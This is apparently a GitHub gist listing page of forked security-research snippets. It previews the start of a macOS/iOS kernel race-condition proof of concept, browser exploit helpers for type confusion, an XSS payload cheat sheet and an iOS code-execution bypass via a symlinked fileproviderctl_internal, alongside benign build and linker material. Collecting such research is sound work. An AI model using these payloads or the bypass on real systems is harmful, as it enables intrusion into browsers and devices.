java.lang.Runtimejava.lang.ProcessBuilder
joydo
/ main.cpp
Created
August 11, 2021 01:23
— forked from hasherezade/main.cpp
A native way to enumerate processes (alternative to: EnumProcesses, CreateToolhelp32Snapshot - Process32First - Process32Next)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <iostream> | |
| #include "ntddk.h" | |
| bool enum_processes() | |
| { | |
| ULONG retLen = 0; | |
| // check length: |
joydo
/ poc.c
Created
September 16, 2021 11:46
— forked from infernalheaven/poc.c
macOS 11.5.2/iOS 14.7.1 Kernel Race Condition poc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab | |
| use it on macOS: cc poc.c -o poc while True; do ./poc ; done | |
| */ | |
| #include <errno.h> | |
| #include <signal.h> | |
| #include <fcntl.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> |
joydo
/ WX_bypass.js
Created
September 16, 2021 11:47
— forked from infernalheaven/WX_bypass.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Helpers { | |
| constructor() { | |
| this.addrof_LO = new Array(1048577); | |
| this.buf = new ArrayBuffer(8); | |
| this.f64 = new Float64Array(this.buf); | |
| this.f32 = new Float32Array(this.buf); | |
| this.u32 = new Uint32Array(this.buf); | |
| this.u64 = new BigUint64Array(this.buf); | |
| this.state = {}; |
joydo
/ concat_exploit.js
Created
September 16, 2021 11:47
— forked from cd789/concat_exploit.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Helpers { | |
| constructor() { | |
| this.buf = new ArrayBuffer(8); | |
| this.f64 = new Float64Array(this.buf); | |
| this.f32 = new Float32Array(this.buf); | |
| this.u32 = new Uint32Array(this.buf); | |
| this.u64 = new BigUint64Array(this.buf); | |
| this.state = {}; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
joydo
/ xss_vectors.txt
Created
September 16, 2021 11:48
— forked from infernalheaven/xss_vectors.txt
XSS Vectors Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
joydo
/ untether.txt
Created
September 26, 2021 01:36
— forked from spacepilotAV/untether.txt
better release tomorrow, but for now, i'll release part of the method.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| i'll do a better release tomorrow or something, but to keep my promise, here's a gist | |
| bug2: | |
| platform-application bypass, | |
| /usr/bin/fileproviderctl is a binary with a purpose i'm not sure of, however, it executes /usr/local/bin/fileproviderctl_internal when run | |
| make /usr/local/bin/fileproviderctl_internal a symlink to your code to execute, and replace a daemon with /usr/bin/fileproviderctl | |
| recommended to use wifiFirmwareLoader, and SUID fileproviderctl with mobile:mobile (if it runs as root containermanagerd has a seizure) | |
| boom, BFU code exec on >11.xish -> 14.xish | |
| bug3: | |
| platform-application bypass, |
joydo
/ Makefile
Created
November 10, 2021 01:19
— forked from kwk/Makefile
Compiling with Address Sanitizer (ASAN) with CLANG and with GCC-4.8
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .PHONY: using-gcc using-gcc-static using-clang | |
| using-gcc: | |
| g++-4.8 -o main-gcc -lasan -O -g -fsanitize=address -fno-omit-frame-pointer main.cpp && \ | |
| ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=$(shell which llvm-symbolizer) ./main-gcc | |
| using-gcc-static: | |
| g++-4.8 -o main-gcc-static -static-libstdc++ -static-libasan -O -g -fsanitize=address -fno-omit-frame-pointer main.cpp && \ | |
| ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=$(shell which llvm-symbolizer) ./main-gcc-static |
joydo
/ implement-an-elf-linker.md
Created
December 24, 2021 01:16
— forked from MaskRay/implement-an-elf-linker.md
Implement an ELF linker
| theme | class | highlighter | fonts | ||||||
|---|---|---|---|---|---|---|---|---|---|
default |
text-center |
MaskRay |
|
OlderNewer